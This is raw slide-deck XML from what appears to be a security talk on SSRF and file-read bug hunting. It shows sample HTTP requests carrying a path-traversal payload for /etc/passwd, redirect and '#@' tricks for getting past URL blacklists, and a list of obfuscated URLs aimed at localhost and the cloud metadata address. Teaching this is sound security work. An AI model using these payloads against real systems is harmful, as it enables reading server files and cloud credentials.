          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../etc/passwd%00</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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44" name="Google Shape;244;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="Google Shape;246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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Google Shape;248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8350" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Redirection </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. http://nicob.net/redir-http-I.P.v.4:PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Will Redirect You To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> I.P.v.4:PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725" name="Google Shape;725;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://nicob.net/redir-http-I.P.v.4:PORT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Google Shape;726;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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727" name="Google Shape;727;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;728;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="729" name="Google Shape;729;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730" name="Google Shape;730;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="731" name="Google Shape;731;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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737" name="Google Shape;737;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;738;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>List Of Patterns To Bypass The Whitelist</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="739" name="Google Shape;739;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Google Shape;740;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="2877925"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="Google Shape;741;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252625" y="3271200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Payloads</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="742" name="Google Shape;742;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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1400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://google.com:80+&amp;@127.88.23.245:22/#+@google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.88.23.245:22/+&amp;@google.com:80#+@google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://google.com:80+&amp;@google.com:80#+@127.88.23.245:22/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.88.23.245:22/?@google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.88.23.245:22/#@www.google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://google.com:80\\@127.88.23.245:22</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80\@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80\@@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80:\@@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.1.1.1:80#\@127.2.2.2:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169。254。169。254/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169｡254｡169｡254/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⑯⑨。②⑤④。⑯⑨｡②⑤④/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://②⑧⑤②⓪③⑨①⑥⑥:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪⓪②⑤①｡⓪⓪⓪③⑦⑥｡⓪⓪⓪⓪②⑤①｡⓪⓪⓪⓪⓪③⑦⑥:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪ⓧⓐ⑨｡⑯⑥⑧⑨⑥⑥②:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://⓪⓪②⑤①｡⓪ⓧⓕⓔ｡④③⑤①⑧:80/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;743;p8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0213" y="2906100"/>
            <a:ext cx="503200" cy="36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4" name="Google Shape;744;p8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61325" y="3332625"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="2458500"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="Google Shape;746;p8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20225" y="2484650"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com# @me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com# @me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
